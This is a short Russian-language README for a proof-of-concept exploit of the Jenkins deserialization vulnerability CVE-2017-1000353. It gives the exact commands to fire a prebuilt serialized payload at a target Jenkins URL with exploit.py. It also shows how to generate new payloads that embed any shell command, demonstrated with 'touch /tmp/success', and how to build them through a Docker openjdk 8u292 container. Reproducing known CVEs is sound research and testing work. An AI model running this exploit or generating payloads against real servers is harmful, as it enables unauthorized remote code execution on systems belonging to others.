
jenkins CVE-2017-1000353 POC
Как воспроизвести уязвимость Jenkins CVE-2017-1000353?
Клонируйте этот репозиторий, используйте готовую полезную нагрузку jenkins_poc.ser с помощью следующей команды:
python exploit.py http://your-ip:8080 jenkins_poc.ser
После этого будет выполнена команда touch /tmp/success.
Важно: Генерация полезной нагрузки зависит от версии Java. Она была успешно протестирована с openjdk:8u292. Другие версии Java могут не работать должным образом для генерации и эксплуатации полезной нагрузки.
jenkins_poc.ser?Загрузите CVE-2017-1000353-SNAPSHOT-all.jar.
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
Если вы используете Docker, вы можете использовать следующую команду для обеспечения совместимости:
docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"